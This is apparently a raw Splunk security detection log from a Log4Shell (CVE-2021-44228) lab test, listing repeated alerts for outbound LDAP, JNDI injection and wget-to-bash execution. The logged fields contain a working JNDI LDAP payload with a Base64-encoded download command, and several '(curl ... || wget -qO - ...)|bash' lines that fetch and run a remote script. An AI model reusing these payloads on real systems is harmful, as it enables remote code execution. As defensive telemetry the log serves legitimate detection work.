info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", 